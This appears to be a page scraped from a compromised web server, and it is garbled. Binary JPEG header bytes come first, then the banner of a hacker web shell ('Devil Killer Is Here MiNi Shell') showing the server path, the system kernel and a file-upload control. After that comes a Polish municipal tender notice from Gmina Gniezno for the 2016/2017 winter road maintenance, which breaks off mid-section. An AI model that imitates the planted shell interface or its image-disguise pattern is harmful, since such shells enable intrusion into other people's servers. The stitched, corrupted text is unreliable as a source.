JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161010/320742-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 320742 - 2016
              z dnia 2016-10-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gniezno: Zimowe utrzymanie dróg gminnych na ternie gminy Gniezno - zima 2016/2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Gniezno, krajowy numer identyfikacyjny
              63125951900000, ul.
              Al. Reymonta 
              42624,
              62200  
              Gniezno, woj.
              wielkopolskie, państwo
              , tel.
              614 245 750, e-mail
              sekretariat@urzadgminy.gniezno.pl, faks
              614 245 751.
              <br />
              Adres strony internetowej (URL): ww.urzadgminy.gniezno.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b></div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />GminaGniezno al. Reymonta 9-11 62-200 Gniezno <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg gminnych na ternie gminy Gniezno - zima 2016/2017<br /><b>Numer referencyjny: </b>UG.271.15.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zimowe utrzymanie dróg gminnych na terenie gminy Gniezno- zima 2016/2017
 Świadczenie usług w zakresie utrzymania dróg gminnych w okresie zimy 2016/2017 tj. odśnieżanie i zwalczanie skutków gołoledzi- podsypywanie pisakiem z solą dróg gminnych na terenie Gminy Gniezno. Usługi będą wykonywane przez Wykonawcę  w zależności od warunków atmosferycznych po ówczesnym zgłoszeniu Zamawiającego. Wykonawca zobowiązany jest podać nr telefonu pod którym będzie dostępny przez 24 godziny na dobę. Ponadto, Wykonawca winien podać kontakt telefoniczny do operatorów sprzętu oraz określić dokładnie rejonizację tj. kto personalnie ja jakim terenie będzie pracował. Wykonawca zobowiązany jest   posiadać w dyspozycji środki transportowe  sprzęt wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól. 
Wszystkie drogi gminne o nawierzchni ulepszonej utrzymywane winny być w standardzie IV,                        a wszystkie pozostałe w standardzie V. 
Przy wycenie usług w zakresie odśnieżania należy podać środki transportowe- sprzęt z wyceną za 1 godzinę świadczonej usługi, bez kosztów dojazdu. 
Przy wycenie usług w zakresie zwalczania skutków gołoledzi należy podać środki transportowe- sprzęt za 1 godzinę świadczonej usługi wraz z niezbędnymi materiałami uszorstniającymi: piasek, sól, bez kosztów dojazdu. 
W zakres niniejszego postępowania wchodzi również droga z Gniezna do Jankowa Dolnego, długość 3450 mb, która wymaga utrzymania w standardzie III. 
Przy wycenie usług w zakresie jej utrzymania należy wycenić j.w. odrębnie odśnieżanie ( środki transportowe, sprzęt, bez kosztów dojazdu) i odrębnie zwalczanie skutków gołoledzi ( środki transportowe, sprzęt, materiały uszorstniające, bez kosztów dojazdu) za 1 godzinę. 
Wykonawca winien oświadczyć, czy zamówienia będzie wykonywał samodzielnie czy przy pomocy podwykonawców- ze wskazaniem części zamówienia, której powierzy podwykonawcom. 
Zamawiający dopuszcza składania ofert częściowych i na odśnieżanie i zwalczanie skutków gołoledzi łącznie na poszczególnie trzy rejony kolorystycznie określone wg załącznika mapowego, nie dopuszcza składania ofert wariantowych. 
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Określenie przedmiotu, wielkości lub zakresu oraz w
arunków na jakich zostaną udzielone 
zamówienia, o których mowa w art. 67 ust. 1 pkt 6 l
ub w art. 134 ust. 6 pkt 3 ustawy Pzp: 
Zamawiający przewiduje udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt. 
6 Pzp  do wysokości 50 % wartości zamówienia podstawowego<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 31/10/2016
                    data zakończenia: 30/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek ten zostanie spełniony, jeżeli Wykonawca posiada dokumenty potwierdzające, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 50 000,00 zł. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	wykonywał usługi w zakresie zimowego utrzymania dróg min. przez dwa lata ( względnie dwa sezony zimowe) o łącznej wartości  min. 150 000,00 zł w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z  podaniem wartości, daty i miejsca wykonania usługi oraz załączeniem dokumentów potwierdzających, że usługi były wykonywane z należytą starannością i terminowe. 
b)	Posiada min. 4 ciągniki wraz z pługami, z napędem 4x4 o mocy minimum 150 KM oraz min. 4 piaskarki. Jeżeli Wykonawca nie dysponuje wymaganym sprzętem do wykonywania zamówienia lub zdolnościami finansowymi, może polegać w celu ich wykonania na innych podmiotach, niezależnie od charakteru prawnego łączącego go z nimi stosunków. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.1 aktualnego zaświadczenia właściwego Naczelnika 
Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem 
zwolnienie, odroczenie lub rozłożenie na raty zaleg
łych płatności lub wstrzymanie w całości 
wykonania decyzji właściwego organu- wystawione nie
 wcześniej niż 3 miesiące przed upływem 
terminu składania ofert; 1.2 aktualne zaświadczenie
 właściwego oddziału Zakładu Ubezpieczeń 
Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie 
zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał 
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
wstrzymanie w całości wykonania decyzji właściwego 
organu- wystawione nie wcześniej niż 3 
miesiące przed upływem terminu składania ofert; 1.3
 odpis z właściwego rejestru lub centralnej 
ewidencji i informacji o działalności gospodarczej,
 jeżeli odrębne przepisy wymagają wypisu do 
rejestru lub ewidencji, w celu potwierdzenia braku 
podstaw wykluczenia na podstawie art. 24 ust. 5 
pkt 1 ustawy; 1.4 oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej 
grupy kapitałowej ( załącznik nr 6 ) ;w przypadku przynależności do tej samej grupy kapitałowej 
wykonawca może złożyć wraz z oświadczeniem dokument
y bądź informacje potwierdzające, że 
powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. - 
Wykonawca, w terminie 3 dni od zamieszczania na stronie internetowej informacji, o której mowa w 
art. 86 ust. 5, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do 
tej samej grupy kapitałowej, o której mowa w art. 2
4 ust. 1 pkt. 23. Wraz ze złożeniem oświadczenia 
wykonawca może przedstawić dowody, że powiązania z 
innym wykonawcą nie prowadzą do 
zakłócenia konkurencjo w postępowaniu o udzielenie 
zamówienia.  </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1 dokument potwierdzające, że wykonawca jest ubezp
ieczony odpowiedzialności cywilnej w zakresie 
prowadzonej działalności związanej z przedmiotem za
mówienia n sumę gwarancyjną określoną przez 
zamawiającego ; 2. W celu potwierdzenia spełnienia 
przez wykonawcę warunków udziału w 
postępowaniu dotyczących zdolności technicznej lub 
zawodowej zamawiający żąda, aby wykonawca 
złożył następujące dokumenty: 2.1. wykaz robót budo
wlanych ( załącznik nr 3) z załączaniem 
dowodów określających czy te roboty budowlane zosta
ły wykonane należycie, w szczelności 
informacji o tym czy roboty zostały wykonane zgodni
e z przepisami prawa budowlanego i 
prawidłowo ukończone, przy czym dowodami, o których
 mowa są referencje bądź inne dokumenty 
wystawione przez podmiot, na rzecz którego roboty b
udowlane były wykonywane, a jeżeli z 
uzasadnionej przyczyny o obiektywnym charakterze wy
konawca nie jest w stanie uzyskać tych 
dokumentów - inne dokumenty; 2.2 wykaz osób skierowanych przez wykonawcę do realizacji 
zamówienia publicznego, w szczególności odpowiedzialnych zaświadczenie usług wraz z informacjami 
na temat ich kwalifikacji zawodowych, uprawień, doświadczenia i wykształcenia niezbędnych do 
wykonywana zamówienia publicznego, a także zakresu 
wykonywanych przez nie czynności oraz 
informacją o podstawie do dysponowania tymi osobami
( załącznik nr 5) <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oferta winna zawierać: 1. Formularz ofertowy (załąc
znik nr 1), 2. Oświadczenie, o którym mowa w 
pkt. III.3) (załącznik nr 2), - Wykonawca, który po
wołuje się na zasoby innych podmiotów, w celu 
wykazania braku istnienia wobec nich podstaw wykluc
zenia oraz spełniania, w zakresie, w jakim 
powołuje się na ich zasoby, warunków udziału w post
ępowaniu zamieszcza informacje o tych 
podmiotach w oświadczeniu.. - Wykonawca, który zami
erza powierzyć wykonanie części zamówienia 
podwykonawcom, w celu wykazania braku istnienia wob
ec nich podstaw wykluczenia z udziału w 
postępowaniu zamieszcza informacje o podwykonawcach
 w oświadczeniu. - W przypadku wspólnego 
ubiegania się o zamówienie przez wykonawców, oświad
czenie składa każdy z Wykonawców wspólnie 
ubiegających się o zamówienie. Dokumenty te potwier
dzają spełnianie warunków udziału w 
postępowaniu oraz brak podstaw wykluczenia w zakres
ie, w którym każdy z Wykonawców wykazuje 
spełnianie warunków udziału w postępowaniu oraz bra
k podstaw wykluczenia. 3. Zobowiązanie 
innego podmiotu (załącznik nr 7) albo inny dokument
, służący wykazaniu udostępnienia wykonawcy 
potencjału przez podmiot trzeci w zakresie określon
ym w art. 22a ust. 1 ustawy Pzp. Wykonawca 
może w celu potwierdzenia spełniania warunków udzia
łu w postępowaniu, w stosownych sytuacjach 
oraz w odniesieniu do konkretnego zamówienia, lub j
ego części, polegać na zdolnościach 
technicznych lub zawodowych lub sytuacji finansowej
 lub ekonomicznej innych podmiotów, 
niezależnie od charakteru prawnego łączących go z n
im stosunków prawnych. Zamawiający żąda od 
Wykonawcy, który polega na zdolnościach lub sytuacj
i innych podmiotów na zasadach określonych w 
art. 22a ustawy Pzp, przedstawienia w odniesieniu d
o tych podmiotów dokumentów wymienionych 
w . 4. Jeżeli wykonawca ma siedzibę lub miejsce zam
ieszkania poza terytorium Rzeczypospolitej 
Polskiej, zamiast dokumentów, o których mowa w pkt 
III.4) 1.1.-1.3. - składa dokument lub 
dokumenty wystawione w kraju, w którym wykonawca ma
 siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie zalega z opł
acaniem podatków, opłat, składek na 
ubezpieczenie społeczne lub zdrowotne albo że zawar
ł porozumienie z właściwym organem w 
sprawie spłat tych należności wraz z ewentualnymi o
dsetkami lub grzywnami, w szczególności 
uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub 
wstrzymanie w całości wykonania decyzji właściwego 
organu, b) nie otwarto jego likwidacji ani nie 
ogłoszono upadłości. 5. Dokumenty, o których mowa w
 pkt 4 lit. b, powinny być wystawione nie 
wcześniej niż 6 miesięcy przed upływem terminu skła
dania ofert. Dokument, o którym mowa w pkt 4. 
lit. a, powinien być wystawiony nie wcześniej niż 3
 miesiące przed upływem tego terminu. 6. Jeżeli w 
kraju, w którym wykonawca ma siedzibę lub miejsce z
amieszkania lub miejsce zamieszkania ma 
osoba, której dokument dotyczy, nie wydaje się doku
mentów, o których mowa w pkt 4, zastępuje się 
je dokumentem zawierającym odpowiednio oświadczenie
 wykonawcy, ze wskazaniem osoby albo 
osób uprawnionych do jego reprezentacji, lub oświad
czenie osoby, której dokument miał dotyczyć, 
złożone przed notariuszem lub przed organem sądowym
, administracyjnym albo organem samorządu 
zawodowego lub gospodarczego właściwym ze względu n
a siedzibę lub miejsce zamieszkania 
wykonawcy lub miejsce zamieszkania tej osoby. Zapis
 pkt 5 stosuje się. 7. W przypadku wątpliwości 
co do treści dokumentu złożonego przez wykonawcę, z
amawiający może zwrócić się do właściwych 
organów odpowiednio kraju, w którym wykonawca ma si
edzibę lub miejsce zamieszkania lub miejsce 
zamieszkania ma osoba, której dokument dotyczy, o u
dzielenie niezbędnych informacji dotyczących 
tego dokumentu. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
